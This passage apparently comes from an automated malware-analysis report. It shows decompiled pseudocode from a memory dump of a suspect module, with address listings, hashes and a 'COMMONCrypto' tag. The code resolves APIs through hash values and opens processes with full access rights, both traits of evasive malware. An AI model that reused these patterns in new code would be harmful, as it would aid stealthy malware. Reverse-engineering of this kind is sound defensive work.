							}
							L13:
							E7056F6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E7056F558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x7057b790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E7056AD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
							E7057218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E7056F568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E7056F6F0( &_v532);
				E7056B680( &_v492);
				E7056F6F0( &_v508);
				return 0;
			}

0x70569144
0x70569148
0x7056914e
0x70569150
0x70569161
0x70569164
0x7056916b
0x70569174
0x7056917b
0x7056917f
0x70569188
0x7056918f
0x70569197
0x7056919c
0x705691ab
0x705691af
0x705691c4
0x705691da
0x705691e8
0x705691e9
0x705691ea
0x705691eb
0x705691ec
0x705691f3
0x705691f7
0x70569201
0x70569216
0x7056922c
0x7056923a
0x7056923b
0x7056923c
0x7056923d
0x7056923e
0x70569245
0x70569249
0x70569253
0x70569268
0x7056927e
0x7056928c
0x7056928d
0x7056928e
0x7056928f
0x70569290
0x70569297
0x7056929b
0x705692a5
0x705692ba
0x705692d0
0x705692de
0x705692df
0x705692e0
0x705692e1
0x705692e2
0x705692e9
0x705692ed
0x705692f7
0x7056930c
0x70569322
0x70569330
0x70569331
0x70569332
0x70569333
0x70569334
0x7056933b
0x7056933f
0x70569349
0x7056935e
0x70569374
0x70569382
0x70569383
0x70569384
0x70569385
0x7056938e
0x70569390
0x7056939b
0x705693a0
0x705693a5
0x705693b1
0x705693b6
0x705693bb
0x705693c7
0x705693cc
0x705693d1
0x705693dd
0x705693e2
0x705693e7
0x705693f3
0x705693f8
0x705693fd
0x70569409
0x7056940e
0x7056941a
0x70569420
0x70569430
0x70569435
0x7056943e
0x70569447
0x7056947e
0x70569487
0x7056948c
0x70569497
0x705694a1
0x705694a7
0x705694b9
0x705694cf
0x705694dd
0x705694de
0x705694df
0x705694e0
0x705694e1
0x705694e8
0x705694f2
0x705694f8
0x7056950a
0x70569520
0x7056952e
0x7056952f
0x70569530
0x70569531
0x70569532
0x70569539
0x70569543
0x70569549
0x7056955b
0x70569571
0x7056957f
0x70569580
0x70569581
0x70569582
0x70569583
0x70569586
0x70569589
0x7056959f
0x705695a4
0x705695a8
0x705695b3
0x705695b8
0x705695bd
0x705695c9
0x705695ce
0x705695d3
0x705695e7
0x705695ef
0x705695f6
0x70569606
0x70569614
0x70569620
0x70569622
0x70569629
0x7056963c
0x70569643
0x7056965c
0x7056966a
0x70569681
0x7056968f
0x70569694
0x705696a0
0x705696ad
0x705696b4
0x705696c9
0x705696ce
0x705696d5
0x705696dc
0x705696e3
0x7056a1d7
0x7056a1de
0x7056a1ea
0x7056a1f6
0x00000000
0x7056a1f6
0x705696f0
0x705696f7
0x00000000
0x00000000
0x7056970c
0x70569711
0x70569722
0x70569727
0x70569733
0x7056973a
0x70569740
0x70569745
0x70569748
0x7056974e
0x7056975c
0x7056975d
0x70569761
0x70569765
0x70569769
0x7056977e
0x70569789
0x7056978a
0x7056978e
0x70569792
0x70569796
0x705697a0
0x705697b6
0x705697b7
0x705697bb
0x705697bf
0x705697c3
0x705697df
0x705697f5
0x705697f5
0x705697fb
0x705697fd
0x70569800
0x70569805
0x7056980c
0x70569810
0x70569814
0x7056981a
0x70569820
0x70569832
0x70569848
0x70569856
0x70569857
0x70569858
0x70569859
0x7056985a
0x70569861
0x7056986b
0x70569871
0x70569883
0x70569899
0x705698a7
0x705698a8
0x705698a9
0x705698aa
0x705698ab
0x705698b2
0x705698bc
0x705698c2
0x705698d4
0x705698ea
0x705698f8
0x705698f9
0x705698fa
0x705698fb
0x705698fc
0x70569903
0x7056990d
0x70569913
0x70569925
0x7056993b
0x70569949
0x7056994a
0x7056994b
0x7056994c
0x7056994d
0x70569950
0x70569954
0x70569958
0x7056995e
0x70569964
0x70569976
0x7056998c
0x7056999a
0x7056999b
0x7056999c
0x7056999d
0x7056999e
0x705699a5
0x705699af
0x705699b5
0x705699c7
0x705699dd
0x705699eb
0x705699ec
0x705699ed
0x705699ee
0x705699ef
0x705699f6
0x70569a00
0x70569a06
0x70569a18
0x70569a2e
0x70569a3c
0x70569a3d
0x70569a3e
0x70569a3f
0x70569a40
0x70569a47
0x70569a51
0x70569a57
0x70569a69
0x70569a7f
0x70569a8d
0x70569a8e
0x70569a8f
0x70569a90
0x70569a96
0x70569a99
0x70569a9b
0x70569aa6
0x70569aab
0x70569ab0
0x70569abf
0x70569ac4
0x70569ac9
0x70569ad8
0x70569add
0x70569ae2
0x70569af1
0x70569af6
0x70569afb
0x70569b0a
0x70569b0f
0x70569b14
0x70569b23
0x70569b28
0x70569b2d
0x70569b3c
0x70569b41
0x70569b46
0x70569b55
0x70569b5a
0x70569b63
0x70569b6b
0x70569b70
0x70569b77
0x70569b84
0x70569b86
0x7056a1bf
0x7056a1c6
0x7056a1d2
0x00000000
0x7056a1d2
0x70569b8c
0x70569b95
0x70569b98
0x70569db0
0x70569db0
0x70569dbb
0x70569ddf
0x70569de1
0x00000000
0x00000000
0x70569de7
0x70569dec
0x70569df3
0x70569e00
0x70569e02
0x00000000
0x00000000
0x70569e08
0x70569e11
0x70569e12
0x70569e14
0x70569e17
0x00000000
0x00000000
0x00000000
0x70569e19
0x70569e1e
0x70569e29
0x70569e29
0x70569e2e
0x70569e35
0x70569e3c
0x70569e43
0x70569e48
0x70569e53
0x70569e55
0x00000000
0x00000000
0x70569e5b
0x70569e60
0x70569e67
0x70569e74
0x70569e76
0x00000000
0x00000000
0x70569e7c
0x70569e85
0x70569e86
0x70569e88
0x70569e8b
0x00000000
0x00000000
0x00000000
0x70569e8d
0x70569e9b
0x70569ea3
0x70569eae
0x70569eb5
0x70569ebc
0x70569ec0
0x70569ec4
0x70569eca
0x70569ed5
0x70569ee0
0x70569ee5
0x70569ee7
0x00000000
0x00000000
0x70569eed
0x70569ef8
0x70569f0e
0x70569f1e
0x70569f20
0x00000000
0x00000000
0x70569f26
0x70569f2b
0x70569f32
0x70569f3f
0x70569f41
0x00000000
0x00000000
0x70569f47
0x70569f50
0x70569f51
0x70569f53
0x70569f56
0x00000000
0x00000000
0x00000000
0x70569f58
0x70569f5d
0x70569f68
0x70569f71
0x70569f84
0x70569f85
0x70569f8c
0x70569f93
0x70569f9a
0x70569f9b
0x70569fa6
0x70569fa8
0x00000000
0x00000000
0x70569fae
0x70569fb3
0x70569fba
0x70569fc7
0x70569fc9
0x00000000
0x00000000
0x70569fcf
0x70569fd8
0x70569fd9
0x70569fdb
0x70569fde
0x00000000
0x00000000
0x00000000
0x70569fe0
0x7056a000
0x7056a005
0x7056a007
0x00000000
0x00000000
0x7056a016
0x7056a022
0x7056a02d
0x7056a039
0x7056a043
0x7056a043
0x7056a046
0x7056a04e
0x7056a05a
0x7056a069
0x7056a071
0x7056a074
0x7056a07d
0x7056a08d
0x7056a092
0x7056a09d
0x7056a0a6
0x7056a0b9
0x7056a0ba
0x7056a0c1
0x7056a0c8
0x7056a0cf
0x7056a0d0
0x7056a0db
0x7056a0dd
0x00000000
0x00000000
0x7056a0e3
0x7056a0e8
0x7056a0ef
0x7056a0fa
0x7056a0fc
0x7056a1b3
0x7056a1ba
0x00000000
0x7056a1ba
0x7056a102
0x7056a10b
0x7056a10c
0x7056a10e
0x7056a111
0x00000000
0x00000000
0x00000000
0x7056a113
0x7056a118
0x7056a123
0x7056a123
0x7056a126
0x7056a12a
0x7056a134
0x7056a138
0x7056a13f
0x7056a14a
0x7056a14e
0x7056a158
0x7056a162
0x7056a166
0x7056a16c
0x7056a177
0x7056a179
0x00000000
0x00000000
0x7056a183
0x7056a188
0x7056a18f
0x7056a19a
0x7056a19c
0x00000000
0x00000000
0x7056a19e
0x7056a1a7
0x7056a1a8
0x7056a1aa
0x7056a1ad
0x00000000
0x00000000
0x00000000
0x7056a1ad
0x7056a200
0x7056a202
0x7056a209
0x7056a20e
0x7056a211
0x7056a21f
0x7056a230
0x7056a23c
0x7056a248
0x7056a254
0x7056a260
0x7056a26c
0x7056a275
0x7056a27e
0x7056a287
0x7056a28e
0x00000000
0x7056a290
0x70569b9e
0x70569ba9
0x70569bb2
0x70569bb7
0x70569bc3
0x70569bc4
0x70569bd4
0x70569be2
0x70569bf5
0x70569c01
0x70569c0d
0x70569c19
0x70569c20
0x70569c23
0x70569c2e
0x70569c30
0x70569cdb
0x70569cdb
0x70569cde
0x70569ce7
0x70569ceb
0x70569cef
0x70569cf5
0x70569cf9
0x70569d05
0x70569d0f
0x70569d13
0x70569d19
0x70569d1f
0x70569d24
0x70569d26
0x70569d3e
0x70569d4a
0x70569d5e
0x70569d63
0x70569d6c
0x70569d6f
0x00000000
0x00000000
0x70569d75
0x70569d7a
0x70569d81
0x70569d8e
0x70569d90
0x00000000
0x00000000
0x00000000
0x70569d90
0x70569d28
0x70569d2f
0x00000000
0x70569d2f
0x70569c36
0x70569c41
0x70569c4f
0x70569c54
0x70569c56
0x70569c59
0x70569c62
0x70569c66
0x70569c6e
0x70569c74
0x70569c78
0x70569c7e
0x70569c8b
0x70569c8f
0x70569c93
0x70569c9b
0x70569ca1
0x70569ca6
0x70569ca8
0x00000000
0x00000000
0x70569cac
0x70569cad
0x70569cb2
0x70569cbc
0x70569cc3
0x70569cce
0x70569cd5
0x00000000
0x00000000
0x00000000
0x70569cd5
0x00000000
0x70569d96
0x70569d96
0x70569d9f
0x70569da0
0x70569da2
0x70569da2
0x00000000
0x70569dab
0x70569449
0x7056944d
0x70569456
0x7056945f
0x00000000

Strings

$EA, xrefs: 705691E1

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: 7055de3ab460a0fab7860ae55821eda24edaf59805115639eb6d918cc47a9552
Instruction ID: 5b876e9513f83489286bac4ad0ac96c0ece696b26b018a9ef3197735e4ab17a7
Opcode Fuzzy Hash: 7055de3ab460a0fab7860ae55821eda24edaf59805115639eb6d918cc47a9552
Instruction Fuzzy Hash: D4A262719183419FD721DF24C845BDEBBF4AFE6700F008A2EB49A971A1EF30A945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 7056A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E7056A5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E7056B714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E7056F56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E7056F6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E7057218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E7056F6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E7056F620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E7056F620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x7057b7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E70572F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E7056F558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E7056F558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E7056B680(_t439 + 0x34);
											E7056B680(_t439 + 8);
											goto L65;
										}
										L62:
										E7056B680(_t439 + 0x34);
										E7056B680(_t439 + 8);
										goto L63;
									}
									_t392 = E7056F558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E7056CB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E7056C33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E7056F8C4(_t439 + 0x14, E7056F568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E7056F558(_t439 + 0x14, E7056F568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E70572F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E7056F8C4(_t439 + 0x40, E7056F568(_t439 + 0x3c) + 4);
											 *(E7056F558(_t439 + 0x40, E7056F568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E7056CDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E7056F558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E7056F558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E7056AD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E7056CDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E7056F558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E7056F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E7056F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E7056F558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E7056F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E7057382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E7056F568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E7056F8C4( *((intOrPtr*)(_t439 + 8)), E7056F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E7056F568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E7056F568( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E7056F558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E7056F558( *((intOrPtr*)(_t439 + 4)), _t413);
										E7057382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E7056F568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E7056F8C4( *((intOrPtr*)(_t439 + 4)), E7056F568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E7056F8C4( *((intOrPtr*)(_t439 + 8)), E7056F568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E7056F558( *((intOrPtr*)(_t439 + 8)), E7056F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E7056F8C4( *((intOrPtr*)(_t439 + 4)), E7056F568( *_t439) + 4);
								 *(E7056F558( *((intOrPtr*)(_t439 + 4)), E7056F568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E7056F558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E70572F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E7056F558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E7056F8C4( *((intOrPtr*)(_t439 + 8)), E7056F568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E7056F558( *((intOrPtr*)(_t439 + 8)), E7056F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E7056F558(_t439 + 0x28,  *(_t439 + 0x70));
										E7056F8C4( *((intOrPtr*)(_t439 + 4)), E7056F568( *_t439) + 4);
										 *(E7056F558( *((intOrPtr*)(_t439 + 4)), E7056F568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7056F558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E7056F558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E7056F568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E7056F568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E7056F558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E7056F558( *((intOrPtr*)(_t439 + 4)), _t420);
										E7057382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E7056F568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E7056F8C4( *((intOrPtr*)(_t439 + 4)), E7056F568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E70572F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E7056F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E7056F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E7056F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E7056F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E7056F558( *((intOrPtr*)(_t439 + 8)), _t422);
										E7057382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E7056F568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E7056F8C4( *((intOrPtr*)(_t439 + 8)), E7056F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E7056F558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x7056a5ae
0x7056a5b0
0x7056a5bb
0x7056a5c1
0x7056a5c5
0x7056a5ca
0x7056a5d0
0x7056a5e0
0x00000000
0x7056a5e2
0x7056a5e2
0x7056a5ed
0x7056a5ed
0x7056ab6b
0x7056ab6d
0x7056ab6e
0x7056abad
0x7056abb1
0x7056abbf
0x7056abcd
0x7056abcd
0x7056abb8
0x7056abd3
0x7056abd8
0x00000000
0x7056abd8
0x7056abbc
0x7056abbd
0x00000000
0x7056a5f7
0x7056a5f7
0x7056a5fb
0x7056a702
0x7056a702
0x7056a707
0x7056a818
0x7056a81c
0x7056a821
0x7056a825
0x7056a94f
0x7056a951
0x7056a955
0x7056a95e
0x7056a967
0x7056a96b
0x7056a974
0x7056a97b
0x7056a97c
0x7056a980
0x7056a984
0x7056a988
0x7056a98a
0x7056aaf4
0x7056aaf4
0x7056aafc
0x7056ab14
0x7056ab16
0x7056ab18
0x7056ab52
0x7056ab52
0x7056ab54
0x7056ab54
0x7056ab57
0x7056ab72
0x7056ab86
0x7056ab89
0x7056ab8e
0x7056ab99
0x7056ab9a
0x7056ab9d
0x7056ab9f
0x7056aba8
0x00000000
0x7056aba8
0x7056ab59
0x7056ab5d
0x7056ab66
0x00000000
0x7056ab66
0x7056ab29
0x7056ab39
0x7056ab3d
0x7056ab3d
0x7056ab40
0x7056ab43
0x7056ab46
0x7056ab4c
0x00000000
0x00000000
0x00000000
0x7056ab4e
0x7056a992
0x7056a992
0x7056a994
0x7056a998
0x7056a99d
0x7056a99f
0x7056a9a3
0x7056a9a6
0x7056a9ae
0x7056a9b0
0x00000000
0x00000000
0x7056a9c7
0x7056a9e2
0x7056a9e4
0x7056a9f7
0x7056a9f9
0x7056a9fb
0x7056aa16
0x7056aa16
0x7056aa1a
0x7056aa1c
0x00000000
0x00000000
0x7056aa1e
0x7056aa21
0x7056aa42
0x7056aa61
0x7056aa67
0x7056aa6a
0x7056aa6f
0x7056aa70
0x7056aa74
0x00000000
0x00000000
0x7056aa7c
0x7056aa7c
0x7056aa7e
0x7056aa8a
0x7056aa96
0x7056aaa0
0x7056aaa3
0x7056aaa6
0x7056aaaa
0x7056aab1
0x7056aab5
0x7056aab9
0x7056aaba
0x7056aabe
0x7056aac3
0x7056aac8
0x7056aacc
0x7056aad0
0x7056aad6
0x7056aadc
0x7056aae2
0x7056aae8
0x7056aaed
0x7056aaee
0x7056aaee
0x00000000
0x7056aa7e
0x00000000
0x7056aa21
0x7056a9ff
0x7056aa10
0x7056aa12
0x7056aa14
0x00000000
0x00000000
0x00000000
0x7056aa14
0x7056aa27
0x00000000
0x7056aa27
0x7056a82b
0x7056a82e
0x7056a830
0x00000000
0x00000000
0x7056a838
0x7056a838
0x7056a83a
0x7056a83a
0x7056a84b
0x7056a84d
0x7056a850
0x00000000
0x00000000
0x7056a946
0x7056a947
0x7056a949
0x00000000
0x00000000
0x00000000
0x7056a949
0x7056a856
0x7056a859
0x7056a863
0x7056a868
0x7056a86a
0x7056a870
0x7056a877
0x7056a87b
0x7056a880
0x7056a884
0x7056acbf
0x7056acd3
0x7056acf6
0x7056acfb
0x7056acfb
0x7056a89b
0x7056a8a0
0x7056a8a0
0x7056a8a0
0x7056a8a0
0x7056a8a6
0x7056a8ab
0x7056a8ad
0x7056a8b2
0x7056a8b9
0x7056a8be
0x7056a8c0
0x7056ac7d
0x7056ac8e
0x7056aca8
0x7056acad
0x7056acad
0x7056a8d6
0x7056a8db
0x7056a8db
0x7056a8db
0x7056a8db
0x7056a8ef
0x7056a90d
0x7056a912
0x7056a922
0x7056a93f
0x7056a941
0x7056a941
0x00000000
0x7056a859
0x7056a70f
0x7056a70f
0x7056a711
0x7056a718
0x7056a726
0x7056a728
0x7056a72b
0x7056a732
0x7056a734
0x7056a765
0x7056a774
